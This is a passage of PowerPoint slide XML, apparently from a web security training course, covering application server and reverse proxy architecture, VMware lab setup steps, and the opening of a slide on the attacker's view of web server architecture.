            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28681"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1947863"/>
            <a:ext cx="609600" cy="871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682"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4995863"/>
            <a:ext cx="609600" cy="871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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application Server Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1668463"/>
            <a:ext cx="5029200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Applications run within a server application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example application servers include IBM WebSphere, BEA WebLogic, JBoss, and Lotus Domino</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application server is usually located behind a proxy server or front end web server with a plug-in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application servers rarely communicate directly with the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Application servers provide applications with self-contained features and additions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29700" name="Can 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7924800" y="2252663"/>
            <a:ext cx="1066800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Data Store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29701" name="Straight Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="2481263"/>
            <a:ext cx="914400" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29702" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5864225" y="5235575"/>
            <a:ext cx="612775" cy="446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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29703" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5441950" y="2100263"/>
            <a:ext cx="1035050" cy="444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Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29704" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6319044" y="3172619"/>
            <a:ext cx="774700" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29705" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6319044" y="4772819"/>
            <a:ext cx="774700" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29706" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="3725863"/>
            <a:ext cx="663575" cy="444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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29707"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2024063"/>
            <a:ext cx="609600" cy="871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708"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3548063"/>
            <a:ext cx="609600" cy="871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709"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5148263"/>
            <a:ext cx="609600" cy="871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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Proxy Server Architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1905000"/>
            <a:ext cx="5181600" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A proxy server front ends for one or more applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sometimes called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>reverse proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> to differentiate it from the proxies used by clients to access the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The proxy passes requests through to the application and caches the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Target for cache poisoning and information disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Both inbound and outbound proxies exist in server architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Proxies provide content caching to applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="Can 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="7848600" y="2133600"/>
            <a:ext cx="1066800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Data Store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30725" name="Straight Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6934200" y="2362200"/>
            <a:ext cx="914400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30726" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5788025" y="5116513"/>
            <a:ext cx="612775" cy="446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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30727" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="1981200"/>
            <a:ext cx="663575" cy="444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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30728" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6242844" y="3053556"/>
            <a:ext cx="774700" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30729" name="Straight Connector 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="6242844" y="4653756"/>
            <a:ext cx="774700" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30730" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="3606800"/>
            <a:ext cx="663575" cy="444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Proxy</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30731"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1905000"/>
            <a:ext cx="609600" cy="871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732"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3429000"/>
            <a:ext cx="609600" cy="871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733"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5072063"/>
            <a:ext cx="609600" cy="871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Set Up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="1125033"/>
            <a:ext cx="8686800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>You will receive 2 DVDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>They contain two zip files and a readme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Extract both zip files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>One from each DVD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Launch them by double-clicking the .vmx file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>VMware will ask if VM </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>was moved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Select "I Moved It" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Both images need to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>be running during ALL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>exercises!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4384325" y="3230564"/>
            <a:ext cx="4429125" cy="2994179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Down Arrow 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="19602386">
            <a:off x="4495037" y="4907379"/>
            <a:ext cx="822960" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2813903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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Perspective of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Site Server Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="1600200"/>
            <a:ext cx="8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Knowing the architecture makes attacking it easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many architectures add features which can be targeted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>First, consider what is the target?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
